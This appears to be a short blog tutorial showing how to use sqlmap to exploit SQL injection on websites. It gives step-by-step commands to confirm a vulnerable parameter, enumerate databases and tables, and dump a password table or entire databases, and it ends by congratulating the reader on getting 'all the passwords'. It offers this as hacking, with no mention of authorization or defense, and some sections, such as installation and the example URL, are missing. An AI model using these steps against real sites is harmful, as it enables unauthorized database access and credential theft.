Category : Information security Management
Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a vulnerable website ,sqlmap can exploit database and do a lot of hacking like getting username and passwords etc. Under certain conditions it can even read and write files on the server.
INSTALLING THE TOOL:-
HOW IS IT POSSIBLE?
Because the developer of that site did not properly escape the parameter id.
Now we will assume that there is a website that has a url in it like this:-
and it is prone to sql injection () This can be easily be tested by opening the url by adding a single quote(’) at the end.
if the site reacts in an unusual way or shows an error it simply means that the site is vulnerable.
LETS GET ON TO IT. SHALL WE:-
Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal
type :- sqlmap.py -u “http://www.vulnerable.com/subcat.php?id=5”
The above is the first command to run with the sqlmap tool. It checks if the site is vulnerable to sql injection or not. Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next step is to find out the names of the databases that exists.
The "--dbs" option is used to get the database list.
type:- sqlmap.py -u “http://www.vulnerable.com/subcat.php?id=5” --dbs
this will tell u the names of databases (folders) in the server’s hard drive (for this situation the database names are confidential and info)
now as we know that the database is saved in the form of table and columns (just like excel), we can see the table names in the folder we just got the names of, by using this command
type:- sqlmap.py -u “http://www.vulnerable.com/subcat.php?id=5” —tables -D confidential
This will show us the names of the tables in that database. suppose there is a table by the name “password”(now that is something interesting and confidential).
GETTING THE EVERYTHING:-
Now comes the most interesting part of extracting the data from the server.
type:- sqlmap.py -u “http://www.vulnerable.com/subcat.php?id=5” —dump -D confidential -T password
congratulations u got all the passwords.
also what u can do is that u can dump all the database of the website using the command
type:- sqlmap.py -u “http://www.vulnerable.com/subcat.php?id=5” --dbs —dump all
Proudly Operated from India
© 2016 Copyrights. All Rights Reserved